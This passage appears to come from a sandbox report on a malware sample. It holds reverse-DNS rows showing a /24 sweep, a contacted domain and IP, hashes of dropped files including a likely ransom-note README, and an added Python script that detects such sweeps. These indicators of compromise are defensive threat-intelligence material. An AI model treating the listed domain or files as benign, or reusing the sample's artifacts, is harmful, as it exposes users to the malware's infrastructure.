| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
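The hundreds of `N.0.127.10.in-addr.arpa` rows are what a reverse-DNS sweep of a /24 looks like in a DNS log, and the same shape is what a network detection should key on. The script below is an added example written for this page, not sandbox output or code from the sample: it parses rows in the report's own pipe-delimited layout (a subset of the table above is embedded as constructed sample input), turns each PTR name back into the address it asks about, and flags any /24 in which at least `min_hosts` distinct addresses were reverse-resolved; the threshold of 10 is an assumption chosen for this example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of rows from the Network table above, in the
# report's own pipe-delimited layout (country | destination | domain | proto).
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | securebestapp20.com | udp |
| US | 172.234.222.143:443 | securebestapp20.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| GB | 95.101.129.209:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
"""

PTR_RE = re.compile(
    r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?$", re.I
)


def ptr_to_ip(name: str):
    """Turn a reverse-lookup name back into the IPv4 address it asks about."""
    m = PTR_RE.match(name.strip())
    if not m:
        return None
    octets = m.groups()[::-1]   # in-addr.arpa lists octets least-significant first
    try:
        return ipaddress.IPv4Address(".".join(octets))
    except ValueError:          # an octet above 255 is not an address
        return None


def parse_rows(text: str):
    """Yield (destination, domain, proto) from the report's table rows."""
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 4:
            yield cells[1], cells[2], cells[3]


def ptr_sweeps(text: str, min_hosts: int = 10):
    """Map each /24 to the number of distinct hosts reverse-resolved in it,
    keeping only networks that reach min_hosts (the sweep threshold)."""
    hosts_by_net = defaultdict(set)
    for _dst, domain, _proto in parse_rows(text):
        ip = ptr_to_ip(domain)
        if ip is None:          # forward lookups and TLS rows carry no PTR name
            continue
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        hosts_by_net[net].add(ip)
    return {str(net): len(hosts) for net, hosts in hosts_by_net.items()
            if len(hosts) >= min_hosts}


if __name__ == "__main__":
    print(ptr_sweeps(SAMPLE_ROWS))
```

Counting distinct addresses per /24 rather than raw query volume keeps repeated lookups of one host (the duplicate 51.0.127.10 row above) from inflating the score, while the full table on this page would put 10.127.0.0/24 far past any sane threshold.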
Files
memory/1932-1-0x00007FF8C2C43000-0x00007FF8C2C45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5dno0bf.rld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1932-10-0x000001AE6F000000-0x000001AE6F022000-memory.dmp
memory/1932-11-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-12-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-13-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
memory/1932-16-0x00007FF8C2C40000-0x00007FF8C3702000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | aa0a32b11dca7b04f4cc5fe8c55cb357 |
| SHA1 | 00e354fd0754a7d721a270cdc08f970b9a3f6605 |
| SHA256 | e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1 |
| SHA512 | 1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8f16eb240c6168b41004cca7306484e6 |
| SHA1 | da34df40f9b1d5b0f9fd49bd1d467879fb40cb06 |
| SHA256 | 48c69824555f42932cc2a1272a03be650dde58a10239ba282e9314ec13ed273a |
| SHA512 | 96c4a859b024e531124139c28bebd4d6f53de3ae7bc378ea3c7662452525d4020d1a76f851651174418cae620c340e8677516a3a70933b2ff2cce6a71a349063 |
C:\Users\Admin\README.80caa7ac.TXT
| MD5 | b58e2411168bbdbec635cf4001635db0 |
| SHA1 | c130cd9caaaa514a6b98c1168e10d44a989d191a |
| SHA256 | 652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a |
| SHA512 | 87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | cd6829f53a60318a54648f4ff9d694c2 |
| SHA1 | eda672c23f219a9cdbe740079412f5fbe04a157d |
| SHA256 | 5410184dfd5ef071de14c78cc7e9488049a85e313a3454250d53e974251ac906 |
| SHA512 | 25a54ac013419868211b704a9b1f4cbc7c0a5b1a0e10cec09cd8eee3fbde7497e36c8e35f0506622eb9a47939c2c6b9590bf9bbf8d43508be13d7f85f7838ec9 |